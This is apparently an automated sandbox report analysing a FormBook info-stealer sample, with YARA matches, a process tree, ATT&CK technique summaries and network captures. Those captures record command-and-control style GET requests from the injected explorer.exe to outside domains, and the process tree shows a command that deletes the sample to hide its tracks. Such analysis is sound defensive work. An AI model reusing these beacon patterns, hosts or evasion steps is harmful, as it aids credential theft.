Sep 29, 2021 04:40:19.359273911 CEST	6369	IN	HTTP/1.1 403 Forbidden Date: Wed, 29 Sep 2021 02:40:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 187 X-Sorting-Hat-ShopId: 59822768316 X-Dc: gcp-europe-west1 X-Request-ID: b2072cc8-88a9-4a8a-bbe3-16e62dc28b18 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 6961d898cb974357-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49818	54.85.93.188	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:40:24.634798050 CEST	6375	OUT	GET /mjyv/?0pK81=Th83CkuYiZ3yTy/NQYNDjmtPTEXY1rwCFz+4Jmb9PkUSuL5FI8psFzofsp4HlXm5aEcRz/p5bA==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 Host: www.jspagnier-graveur.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:40:24.774866104 CEST	6376	IN	HTTP/1.1 200 OK Date: Wed, 29 Sep 2021 02:40:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 34 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 38 64 38 64 38 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 42 72 6f 77 73 65 72 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 32 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 73 68 61 64 6f 77 5f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 5f 62 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 2e 68 65 61 64 65 72 53 68 6f 72 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 5f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 74 6f 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 0d 0a 20 20 20 Data Ascii: 14cb<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body { background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x; } .pageBrowserError { min-height: 600px; } .container { margin: 0 auto; width: 922px; } .shadow_l { margin-left: 10px; } .main_bg { background: #fff; } #header { padding: 0 2px; background: #fff; } #header.headerShort { height: 65px; } #header .header_in { padding-right: 14px; height: 145px; overflow: hidden; background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x; } #header .header_top { height: 65px; overflow: hidden

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49819	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:40:34.965442896 CEST	6382	OUT	GET /mjyv/?0pK81=XUhyKAoPsp+sS+2wc1lVw6UQrcGLXYJeNJI1ueZmTZNqKWlflngblX9CeHA9F+AScG6M63wGOw==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 Host: www.chinatowndeliver.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:40:35.112025976 CEST	6382	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 29 Sep 2021 02:40:35 GMT Content-Type: text/html Content-Length: 275 ETag: "61525011-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: UaTmOE6yP9.exe PID: 6468 Parent PID: 5772

General

Start time:	04:38:26
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\UaTmOE6yP9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Imagebase:	0x8e0000
File size:	1048576 bytes
MD5 hash:	4C70D5B1C63A468F7E0AEDF64F93CA42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.609581853.00000000042C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: UaTmOE6yP9.exe PID: 6624 Parent PID: 6468

General

Start time:	04:38:28
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\UaTmOE6yP9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\UaTmOE6yP9.exe
Imagebase:	0x8e0000
File size:	1048576 bytes
MD5 hash:	4C70D5B1C63A468F7E0AEDF64F93CA42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.411616931.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.411950671.0000000000D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.411791458.0000000000D50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3440 Parent PID: 6624

General

Start time:	04:38:31
Start date:	29/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.387462859.000000000F3BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: wscript.exe PID: 7088 Parent PID: 3440

General

Start time:	04:38:56
Start date:	29/09/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0x12b0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.608749875.0000000004FE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.608816481.0000000005010000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 7124 Parent PID: 7088

General

Start time:	04:39:00
Start date:	29/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7140 Parent PID: 7124

General

Start time:	04:39:01
Start date:	29/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report UaTmOE6yP9

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers